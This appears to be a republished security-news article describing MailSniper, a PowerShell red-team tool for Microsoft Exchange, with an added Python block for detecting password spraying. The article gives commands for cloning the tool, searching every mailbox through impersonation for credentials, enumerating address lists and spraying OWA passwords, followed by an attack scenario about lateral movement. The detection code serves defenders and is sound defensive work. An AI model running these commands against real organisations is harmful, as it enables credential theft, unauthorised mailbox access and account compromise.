MailSniper – PowerShell Tool for Exchange Mailbox Search and Credential Discovery
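MailSniper is a PowerShell-based penetration testing tool for targeted or large-scale mailbox searches in Microsoft Exchange environments. It supports keyword search, Global Address List enumeration, password spraying and other functions, and can use organisation-level permissions to obtain sensitive information and network intelligence, playing an important role in red team operations. 2025-8-18 18:45:4 Author: www.darknet.org.uk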

MailSniper is a PowerShell-based penetration testing tool for Microsoft Exchange environments. It enables targeted or mass searches of mailboxes to uncover credentials, insider intelligence, and infrastructure details. Standard users can query their mailbox, while administrators with the **ApplicationImpersonation** role can run organisation-wide searches.

This complements darknet.org.uk’s coverage of offensive tooling by extending reconnaissance into the email layer, alongside previously covered post-exploitation frameworks like Nishang and password spraying tools such as TREVORspray.

Key Features

  • Invoke-SelfSearch: Search the current user’s mailbox for defined keywords
  • Invoke-GlobalMailSearch: Use impersonation to search all mailboxes
  • Get-GlobalAddressList: Enumerate email addresses from the Global Address List
  • Get-ADUsernameFromEWS: Map email addresses to Active Directory usernames
  • Invoke-OpenInboxFinder: Identify accessible shared or group mailboxes
  • Password spraying modules for OWA, EWS, and ActiveSync

Installation & Usage

Requirements: Windows with PowerShell and network access to Exchange.

git clone https://github.com/dafthack/MailSniper.git
Import-Module .\MailSniper\MailSniper.ps1

Common usage examples:

# Search current mailbox

Invoke-SelfSearch -Mailbox user@domain.com

# Search all mailboxes with impersonation

Invoke-GlobalMailSearch -ImpersonationAccount admin -ExchHostname exchange.domain.local -OutputCsv results.csv

# Enumerate GAL and map usernames

Get-GlobalAddressList -ExchHostname exchange.domain.local -Username user@domain.local -Password P@ssw0rd

Get-ADUsernameFromEWS -EmailList .\users.txt

# Password spray against OWA

Invoke-PasswordSprayOWA -ExchHostname exchange.domain.local -UserList .\users.txt -Password Winter2025!
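
A defender's view of the spraying modules listed above, as an added example (not part of the original article or of MailSniper): it flags a source that fails authentication against many distinct accounts across OWA, EWS and ActiveSync within one window, and reports any account that logged in successfully from that source. The record layout, thresholds and sample records are constructed assumptions; map your own IIS or proxy log fields onto them.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Exchange front ends that the spraying modules listed above authenticate against.
AUTH_PATHS = ("/owa/", "/ews/", "/microsoft-server-activesync")

# Constructed sample records (assumed layout): time, source IP, path, user, result.
SAMPLE_LOG = """\
2025-08-18T09:00:02 203.0.113.7 /owa/auth.owa alice FAIL
2025-08-18T09:00:05 203.0.113.7 /owa/auth.owa bob FAIL
2025-08-18T09:00:09 203.0.113.7 /owa/auth.owa carol OK
2025-08-18T09:00:12 203.0.113.7 /EWS/Exchange.asmx dan FAIL
2025-08-18T09:00:15 203.0.113.7 /EWS/Exchange.asmx erin FAIL
2025-08-18T09:00:19 203.0.113.7 /Microsoft-Server-ActiveSync frank FAIL
2025-08-18T09:01:00 198.51.100.20 /owa/auth.owa heidi FAIL
2025-08-18T09:01:20 198.51.100.20 /owa/auth.owa heidi FAIL
2025-08-18T09:02:10 198.51.100.20 /owa/auth.owa heidi OK
2025-08-18T09:03:00 192.0.2.50 /owa/auth.owa ivan FAIL
2025-08-18T09:04:00 192.0.2.50 /EWS/Exchange.asmx judy FAIL
"""

def parse(text):
    for line in text.strip().splitlines():
        ts, ip, path, user, result = line.split()
        yield datetime.fromisoformat(ts), ip, path.lower(), user.lower(), result

def find_sprays(text, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Return {ip: {"targets", "succeeded"}} for sources failing against many accounts."""
    fails, oks = defaultdict(list), defaultdict(set)
    for ts, ip, path, user, result in parse(text):
        if not path.startswith(AUTH_PATHS):
            continue
        if result == "FAIL":
            fails[ip].append((ts, user))
        else:
            oks[ip].add(user)
    findings = {}
    for ip, events in fails.items():
        events.sort()
        start, best = 0, Counter()
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:  # slide the window forward
                start += 1
            seen = Counter(user for _, user in events[start:end + 1])
            if len(seen) > len(best) and max(seen.values()) <= max_per_user:
                best = seen  # widest set of accounts, few tries each
        if len(best) >= min_users:
            # A success from a spraying source marks an account to reset and review.
            findings[ip] = {"targets": sorted(best), "succeeded": sorted(oks[ip])}
    return findings
```

On the sample, only 203.0.113.7 is flagged; the user retrying a forgotten password and the two-user source stay below the thresholds.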

Attack Scenario

In a red team engagement, a tester compromises an account with ApplicationImpersonation rights and runs:

Invoke-GlobalMailSearch -ImpersonationAccount attacker -ExchHostname mail.corp.local -OutputCsv creds.csv

The output reveals passwords, VPN details, and network diagrams sent over email. Coupled with GAL enumeration, the tester now has a user map and live credentials, enabling lateral movement and deeper compromise.

Conclusion

MailSniper brings a targeted, high-value capability to the red team arsenal, turning email systems into an intelligence goldmine. In engagements where Exchange is present, it bridges initial access and lateral movement by uncovering credentials and network insight that would otherwise remain hidden. Paired with password spraying and mailbox enumeration, it can rapidly expand an attacker’s foothold and operational scope.

You can read more or download MailSniper here: https://github.com/security-geeks/MailSniper


Article source: https://www.darknet.org.uk/2025/08/mailsniper-powershell-tool-for-exchange-mailbox-search-and-credential-discovery/